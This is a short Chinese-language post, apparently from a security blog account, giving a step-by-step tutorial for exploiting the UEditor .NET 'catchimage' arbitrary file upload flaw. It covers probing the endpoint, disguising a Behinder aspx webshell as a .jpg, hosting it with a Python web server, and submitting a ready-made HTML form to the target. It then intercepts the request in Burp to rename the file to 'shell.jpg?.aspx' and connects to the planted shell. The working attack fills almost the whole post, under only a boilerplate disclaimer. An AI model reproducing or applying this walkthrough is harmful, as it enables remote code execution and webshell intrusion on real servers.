大数跨境
0
0

Ueditor编辑器RCE教程

Ueditor编辑器RCE教程 黑狐安全BlackFox
2025-01-19
2

个人做个笔记

Ueditoer编辑器的任意文件上传,上传木马

注意:该漏洞只影响.net的版本,其他语言的不受影响

第一步:验证漏洞是否存在

拼接地址:/Utility/UEditor/net?action=catchimage

显示{"state":"参数错误:没有指定抓取源"},说明可能存在

第二步,使用冰蝎生成一个aspx的木马,然后改名后缀为.jpg

第三步:准备一台公网服务器,只要能开启web访问的都行,将shell.jpg上传至自己的服务器

使用python开启web,命令:python3.7 -m http.server 8080

确保能正常访问

第四步:在自己电脑新建一个html文件,内容如下:

这里需要填入目标的URL

<form action="https://www.xxxxx.com:8880/Utility/UEditor/net?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST"><p>shell addr:<input type="text" name="source[]"/></p><input type="submit" value="submit"/></form>

直接本地打开html文件

第五步:输入自己公网服务器网址文件的绝对路径

第六步:开启BP,抓包,修改文件名为:shell.jpg?.aspx放包

返回地址

第七步:直接使用冰蝎连接

成功连上


【声明】内容源于网络
0
0
黑狐安全BlackFox
免责声明:在此公众号文章学习和使用工具过程中,如果您存在任何非法行为,您需要自行承担后果,我们不负任何法律责任!仅作学习交流。公众号介绍:分享网络安全常识,网络安全基础,各类网络系统渗透技巧,渗透工具等使用,网络安全研究等
内容 4
粉丝 0
黑狐安全BlackFox 免责声明:在此公众号文章学习和使用工具过程中,如果您存在任何非法行为,您需要自行承担后果,我们不负任何法律责任!仅作学习交流。公众号介绍:分享网络安全常识,网络安全基础,各类网络系统渗透技巧,渗透工具等使用,网络安全研究等
总阅读8
粉丝0
内容4